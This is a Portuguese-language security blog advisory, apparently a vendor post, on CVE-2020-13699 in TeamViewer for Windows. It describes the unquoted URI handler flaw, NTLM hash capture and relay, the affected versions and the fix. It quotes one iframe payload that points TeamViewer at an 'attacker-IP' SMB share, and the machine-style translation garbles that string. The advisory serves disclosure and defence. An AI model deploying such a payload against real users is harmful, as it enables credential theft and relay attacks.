A vulnerabilidade de alto risco no TeamViewer pode ser explorada para quebrar a senha dos usuários – SecPod Blog
Uma vulnerabilidade de alto risco foi encontrada no TeamViewer para Windows. Ele é rastreado como “CVE-2020-13699”, com uma pontuação base CVSS de “8.8” que poderia ser explorada por atacantes remotos para quebrar a senha dos usuários e, em seguida, levar a uma maior exploração do sistema.
TeamViewer é um aplicativo de software para controle remoto, compartilhamento de desktop, reuniões on-line, conferências na Web e transferência de arquivos entre computadores desenvolvidos pela empresa alemã TeamViewer GmbH. O TeamViewer está disponível para os sistemas operacionais Microsoft Windows, Linux, MacOS, Chrome OS, Android, iOS, Windows RT, Windows Phone 8 e BlackBerry. Também é possível acessar um sistema executando o TeamViewer com um navegador da Web.
Um recente aumento no uso de aplicativos de software de conectividade remota devido ao recente COVID-19 Pandemia de trabalho da cultura doméstica.
(CVE-2020-13699) Vulnerabilidade Detalhes:
- CVE-2020-13699 é uma falha de segurança que deriva de um caminho ou elemento de busca não cotado. Especificamente, esta vulnerabilidade deve-se ao fato de a aplicação não citar corretamente seus manipuladores URI personalizados.
- Um usuário com uma versão do TeamViewer vulnerável instalada é enganado ao visitar um site maliciosamente criado para explorar esta vulnerabilidade.
- De acordo com Jeffrey Hofmann, um engenheiro de segurança do Praetorian, que descobriu e revelou a vulnerabilidade “Um atacante poderia incorporar um iframe malicioso em um site com uma URL criada (iframe src=’teamviewer10: -play \i1}attacker-IP\i1}fake.tvs’) que lançaria o cliente desktop do TeamViewer Windows e o forçaria a abrir um compartilhamento remoto SMB”
- Windows executará a autenticação NTLM ao abrir o compartilhamento SMB. Essa solicitação pode ser retransmitida, ou seja, permite que um atacante capture uma autenticação e a envie para outro servidor, garantindo-lhes a capacidade de realizar operações no servidor remoto usando o privilégio do usuário autenticado.
- Exploração bem sucedida dessa vulnerabilidade poderia permitir que um atacante remoto iniciasse o TeamViewer com parâmetros arbitrários. A aplicação poderia ser forçada a retransmitir um pedido de autenticação NTLM ao sistema do atacante, permitindo ataques offline à tabela do arco-íris e tentativas de rachadura por força bruta.
- Estes ataques poderiam levar a exploração adicional devido a credenciais roubadas da exploração bem sucedida da vulnerabilidade.
A divulgação sugeriu que não há evidência desta exploração da vulnerabilidade.
De acordo com o CIS, o risco de exploração é alto para instituições governamentais e empresas de médio porte. No caso de pequenas empresas, o risco é médio e baixo para usuários domésticos.
Impacto
A exploração das vulnerabilidades pode permitir que atacantes remotos obtenham informações confidenciais ou assumam total controle sobre o sistema afetado.
Produtos afetados
TeamViewer Windows Desktop Application antes do 8.0.258861, 9.0.258860, 10.0.258873,11.0.258870, 12.0.258869, 13.2.36220, 14.2.56676, 14.7.48350, e 15.8.3.
Solução
TeamViewer publicou uma atualização de segurança endereçando CVE-2020-13699. SanerNow conteúdo de segurança para detectar e mitigar esta vulnerabilidade é publicado. Nós recomendamos fortemente a aplicação da atualização de segurança com nossa instrução do artigo de suporte publicado.